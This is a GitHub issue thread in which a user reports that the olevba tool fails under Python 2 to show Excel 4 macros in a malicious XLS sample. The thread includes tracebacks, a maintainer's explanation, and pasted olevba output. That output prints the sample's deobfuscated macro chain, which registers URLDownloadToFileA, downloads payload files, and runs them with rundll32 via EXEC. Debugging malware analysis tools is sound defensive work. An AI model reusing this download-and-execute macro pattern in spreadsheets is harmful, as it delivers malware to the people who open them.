OLEVBA do not show xls macro while OLEID indicate it exist

[randubin]

Affected tool:
olevba version 0.6 (latest)
Describe the bug
OLEVBA failed to show and detect the macro inside XLS file. While OleId do indicate that.

FILE: 062d8e8c3de4faeb07f686514dbb8f9d.xls
Type: OLE
ERROR    Error when running XLMMacroDeobfuscator
ERROR    Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/olevba.py", line 3453, in _extract_xlm_plugin_biff
    self.xlm_macros = biff_plugin.Analyze()
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
    parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
    cellref, expression = ParseLoc(expression, cellrefformat, True)
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
    row, column = struct.unpack(formatcodes, expression[0:formatsize])
struct.error: unpack requires a buffer of 4 bytes
**No VBA or XLM macros found.**

File/Malware sample to reproduce the bug
Link: https://bazaar.abuse.ch/sample/2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f/
sha256: 2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f

OleId:

OleId
How To Reproduce the bug
regular run of oleid and olevba.
Expected behavior
olevba macro detected.

Console output / Screenshots
If applicable, add screenshots to help explain your problem.
Use the option "-l debug" to add debugging information, if possible.

Version information:

• OS: Mac
• OS version: x.xx - 32/64 bits
• Python version:3.8.8 - 64 bits
• oletools version: 0.6

Additional context
no need.

[randubin]

I can see this problem was solved in version oletools-0.60.1.dev6.
Sorry.

[randubin]

Sorry for python 3.8.8 it works with the latest version.
For python 2.7.18 with the latest oletools ( 0.60.1.dev6 ) OleId and olevba do not detect the macro.
Python 2.7.18:

Type: OLE
ERROR    Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/olevba.py", line 3454, in _extract_xlm_plugin_biff
    self.xlm_macros = biff_plugin.Analyze()
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
    parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
    cellref, expression = ParseLoc(expression, cellrefformat, True)
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
    row, column = struct.unpack(formatcodes, expression[0:formatsize])
error: unpack requires a string argument of length 4
No VBA or XLM macros found.

Python 3.8.8:

Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: DocuSign., Macrosheet
' CELL:E178, =EXEC((('Bob'!L39&" ")&'Bob'!J39)&'Bob'!L41), 0
' CELL:D181, =Kopaters(0.0,('Bob'!J43&C191)&C185,'Bob'!J39&"2",0.0,0.0), 29
' CELL:D183, =Kopaters(0.0,('Bob'!J43&C193)&C185,'Bob'!J39&"4",0.0,0.0), 29
' CELL:E182, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"4")&'Bob'!L41), 0
' CELL:E180, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"2")&'Bob'!L41), 0
' CELL:D185, =Kopaters(0.0,('Bob'!J43&C195)&C185,'Bob'!J39&"6",0.0,0.0), 29
' CELL:E184, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"6")&'Bob'!L41), 0
' CELL:D178, =REGISTER((((('Bob'!H39&'Bob'!H40)&'Bob'!H41)&'Bob'!H42)&'Bob'!H43)&'Bob'!H44,(((((((((('Bob'!I39&'Bob'!I40)&'Bob'!I41)&'Bob'!I42)&'Bob'!I43)&'Bob'!I44)&'Bob'!I45)&'Bob'!I46)&'Bob'!I47)&'Bob'!I48)&'Bob'!I49)&"ToFileA","JJCCBB","Kopaters",,1.0,9.0), 0
' CELL:E186, =HALT(), 0
' CELL:D182, =Kopaters(0.0,('Bob'!J43&C192)&C185,'Bob'!J39&"3",0.0,0.0), 29
' CELL:D180, =Kopaters(0.0,('Bob'!J43&C190)&C185,'Bob'!J39&"1",0.0,0.0), 29
' CELL:A180, =GOTO(D178), 0
' CELL:E179, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"1")&'Bob'!L41), 0
' CELL:D184, =Kopaters(0.0,('Bob'!J43&C194)&C185,'Bob'!J39&"5",0.0,0.0), 29
' CELL:C185, =<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&".jpg", 3118268.jpg
' CELL:E181, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"3")&'Bob'!L41), 0
' CELL:E183, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"5")&'Bob'!L41), 0
' CELL:D188, =GOTO(E178), 42
' CELL:D179, =D184, 0.0
...
..
' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:
' CELL:A180      , FullEvaluation      , GOTO(D178)
' CELL:D178      , FullEvaluation      , =REGISTER("URLMon","URLDownloadToFileA","JJCCBB","Kopaters",1,9)
' CELL:D179      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D180      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss1",0,0)
' CELL:D181      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss2",0,0)
' CELL:D182      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss3",0,0)
' CELL:D183      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss4",0,0)
' CELL:D184      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D185      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss6",0,0)
' CELL:D188      , FullEvaluation      , GOTO(E178)
' CELL:E178      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss,DllRegisterServer")
' CELL:E179      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss1,DllRegisterServer")
' CELL:E180      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss2,DllRegisterServer")
' CELL:E181      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss3,DllRegisterServer")
' CELL:E182      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss4,DllRegisterServer")
' CELL:E183      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss5,DllRegisterServer")
' CELL:E184      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss6,DllRegisterServer")
' CELL:E186      , End                 , HALT()
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|URLDownloadToFileA  |May download files from the Internet         |
|Suspicious|EXEC                |May run an executable file or a system       |
|          |                    |command using Excel 4 Macros (XLM/XLF)       |
|Suspicious|REGISTER            |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
...
...
...
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+----------------

[decalage2]

I see that on Python 3 you have XLMMacroDeobfuscator installed, so it works well. But on Python 2 it is not installed, so olevba falls back to plugin_biff instead, and it triggers an exception when parsing the macro.
If you install XLMMacroDeobfuscator on python 2 it should work: could you please try?
You can do it by running pip2 install -U oletools[full]

[randubin]

It seems that XLMMacroDeobfuscator doesn't support python 2, only >3.4.
I tried to install it with 'full', but I. am getting the following error:
ERROR: Could not find a version that satisfies the requirement complete (from versions: none)
ERROR: No matching distribution found for full
When Installing XLMMacroDeobfuscator directly, I am getting:
ERROR: Package 'XLMMacroDeobfuscator' requires a different Python: 2.7.18 not in '>=3.4'
Thanks for the help!

[decalage2]

OK, good catch. Then I need to adapt the setup script for python 2.
And to improve error handling when executing plugin_biff + check why oleid reports macros and not olevba.